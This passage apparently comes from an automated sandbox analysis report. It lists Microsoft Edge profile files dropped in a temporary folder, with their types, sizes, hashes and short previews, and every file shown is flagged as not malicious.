                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\GPUCache\data_2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\GPUCache\data_3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\GPUCache\index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):262512
                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:LsNlxp:Ls3
                                                                                                                                      MD5:5F7F77CC945D2A6412786398FDA98B61
                                                                                                                                      SHA1:168FA50BC620F7207222CD89A6F0D01EE27C1AF1
                                                                                                                                      SHA-256:642A33B84DF5DA1D1F86093533A92CA15F968FFB6CBEB156620062FBD87FE347
                                                                                                                                      SHA-512:C534436513DC709ECB1C23F50CD3510C79BEDF742695E554D613D621AA86EE4414DBB9E935A1D3E81866F22C4B6A356CCE148B9DDE7BD5FED518C4E700A5F06D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............................................%./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\History

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):155648
                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\HubApps Icons

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28672
                                                                                                                                      Entropy (8bit):0.33890226319329847
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                                                      MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                                                      SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                                                      SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                                                      SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Local Storage\leveldb\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Local Storage\leveldb\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Local Storage\leveldb\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):283
                                                                                                                                      Entropy (8bit):5.2386601213600095
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWSBdK1N723fQmba2jM8B2KLlpPWS/lAQ+q2PN723fQmba2jMGIFUv:7xCaZjFLTxX+vVaZEFUv
                                                                                                                                      MD5:F2835F82C35FEE840A877C82D1F39905
                                                                                                                                      SHA1:5C80C5628BEB1ECDA53ABF6939EAFFF893B92A95
                                                                                                                                      SHA-256:64E720A208B48179883B2348D6177D26789D66C61109C34B5C233C3DFFE9FF99
                                                                                                                                      SHA-512:26675B9C605E1A47FB577835432262B2BDBA77B9A41F6C0F42EFC384B5C39A44B05B17350328DC3DEF0B9F62D3A54CAEEA45B4838F78BB9ED7044785C8E12AA6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:23.772 17bc Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Local Storage\leveldb since it was missing..2024/12/18-13:28:23.821 17bc Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Local Storage\leveldb/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Login Data

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51200
                                                                                                                                      Entropy (8bit):0.8745933985004888
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:y8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:y8yLG7IwRWf4
                                                                                                                                      MD5:7A9BF0D6AB6967E057DB6BA4EE45243B
                                                                                                                                      SHA1:0C8775DE3A37242BA7CF2FAE40613E935970928F
                                                                                                                                      SHA-256:E3C8C78A681C3CB37BE10D4B3D9E97E05D438DCF71FBF9CE4F388A3F3218BE8F
                                                                                                                                      SHA-512:42BCF1D8588E89E9DE413A4AE5C973D5F149F09273CB293EDF53AB2EF94D493310F19F10CA06EBDF6893CB46AA234A5BAA1C4CD1D531F26C1B406B7AE459EEDA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Network\78bb810b-70c0-4fd9-be59-d06c48711bf1.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2
                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[]

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Network\820b35e3-4fd2-4877-b940-8e88c5010622.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2
                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[]

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Network\Cookies

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20480
                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2
                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[]

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Network\SCT Auditing Pending Reports~RF484fb.TMP (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2
                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[]

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Network\Trust Tokens

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):36864
                                                                                                                                      Entropy (8bit):0.36515621748816035
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                      MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                      SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                      SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                      SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Nurturing\campaign_history

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20480
                                                                                                                                      Entropy (8bit):0.46731661083066856
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                      MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                      SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                      SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                      SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\README

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):182
                                                                                                                                      Entropy (8bit):4.2629097520179995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                                                      MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                                                      SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                                                      SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                                                      SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Session Storage\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Session Storage\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):61
                                                                                                                                      Entropy (8bit):3.7273991737283296
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                      MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                      SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                      SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                      SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:*...#................version.1..namespace-..&f...............

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Session Storage\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Session Storage\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):271
                                                                                                                                      Entropy (8bit):5.209739838145984
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWF1N723fQmoQM72KLlpPW6vLkAQ+q2PN723fQmoQMxIFUv:7casLTJvLC+vVaTFUv
                                                                                                                                      MD5:0AC665B1794EB2A928EA1C4A00A87FFA
                                                                                                                                      SHA1:20C6FA6C2DF32C7926F4C6513DB070D893F7AA87
                                                                                                                                      SHA-256:1B933D843C1AC5B6891D829A41274C10391D4B00AF510E65328598FBF5F35E74
                                                                                                                                      SHA-512:3BA0A70E00244766ACA3C0569EA89A9653FCAC30557BD92734E5A7153679568316AEE7BEA0B6F6A932F7EA5CCBCCD15AA020B86059823A1CF26258F76EE76667
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:24.339 17bc Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Session Storage since it was missing..2024/12/18-13:28:24.380 17bc Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Session Storage/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Session Storage\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Site Characteristics Database\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Site Characteristics Database\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40
                                                                                                                                      Entropy (8bit):3.473726825238924
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:41tt0diERGn:et084G
                                                                                                                                      MD5:148079685E25097536785F4536AF014B
                                                                                                                                      SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                                                      SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                                                      SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.On.!................database_metadata.1

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Site Characteristics Database\CURRENT (copy)

